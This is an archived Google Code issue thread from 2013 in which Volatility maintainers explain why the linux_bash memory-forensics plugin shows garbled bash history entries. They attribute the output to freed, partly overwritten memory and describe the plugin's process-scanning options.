Closed GoogleCodeExporter closed 9 years ago
Original comment by jamie.l...@gmail.com
on 16 Jun 2013 at 4:00
You are using the -P option which tells the plugin to print unallocated
(previously freed) entries. These entries can be corrupt / overwritten, which
is likely why you are seeing that output. Can you run again without -P and see
what results you get?
Original comment by atc...@gmail.com
on 16 Jun 2013 at 4:03
@thanhphuctp did you get a chance to re-run the plugin like @atcuno asked? Can
this issue be closed?
Original comment by michael.hale@gmail.com
on 20 Jun 2013 at 1:53
@atcuno: thanks you, I re-run without -P but the result is the same. I also try
to change some parameters, however, nothing changes.
Don't we need to specify the process id of bash in this plugin? It seems to
scan all image.
Original comment by thanhphuctp
on 20 Jun 2013 at 3:37
I have looked into this issue and I believe the scanner is simply finding
previously freed entries that appear valid (you can see the timestamp is
correct), but the command part has been overwritten by a later allocation.
These pieces of information are kept in separate places in process memory so it
is entirely possible for this to occur. Unless there is evidence of tampering
with the history in memory by the attacker, I would just ignore the garbled
entries.
Original comment by atc...@gmail.com
on 16 Jul 2013 at 5:34
Also, to answer your question, no, you don't *need* to specify the process id
of bash in the plugin. By default, it only scans processes named "bash" but
there's a command-line switch to make it scan all processes...which is useful
in case an attacker copies /bin/bash to /tmp/a or something. You can read more
about it on the wiki:
https://code.google.com/p/volatility/wiki/LinuxCommandReference23#linux_bash
Original comment by michael.hale@gmail.com
on 19 Jul 2013 at 5:22
Original issue reported on code.google.com by
thanhphuctp
on 15 Jun 2013 at 11:03